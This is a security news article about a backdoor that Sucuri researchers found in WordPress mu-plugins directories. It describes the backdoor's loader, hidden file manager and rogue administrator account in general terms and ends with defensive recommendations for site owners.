In a disturbing revelation for website security, cybersecurity researchers from Sucuri have identified a sophisticated backdoor stealthily implanted in the ‘mu-plugins’ directory of WordPress sites. This backdoor allows threat actors persistent access to the websites, enabling them to execute arbitrary actions without detection.
Must-use plugins, or mu-plugins, are unique to WordPress as they are automatically activated across all installations and are hidden from the default plugin list within the wp-admin dashboard. This hidden nature is what makes them particularly attractive to cybercriminals looking to exploit vulnerabilities. The discovered malware uses the mu-plugins directory to store a PHP script named ‘wp-index.php,’ which acts as a loader, fetching malicious payloads and embedding them into the WordPress database, specifically within the wp_options table.
Security researcher Puja Srivastava noted that the backdoor also extracts an obfuscated remote payload from a URL encoded with ROT13, a simple cipher method that further aids in avoiding detection. Once the payload is obtained, it is executed on the server, providing the attacker with full control over the site.
The malware creates additional hidden files, such as a file manager in the theme directory called ‘pricing-table-3.php,’ which allows malicious actors to browse, upload, or delete files at will. Furthermore, it generates an administrator account named ‘officialwp’ and can modify administrator usernames’ passwords, effectively locking out legitimate users.
This ongoing threat poses severe risks to website owners, which may include data theft or the injection of harmful content aimed at users visiting compromised sites. To prevent such attacks, experts recommend that WordPress site administrators update their software and plugins regularly, implement two-factor authentication, and routinely audit all areas of their sites.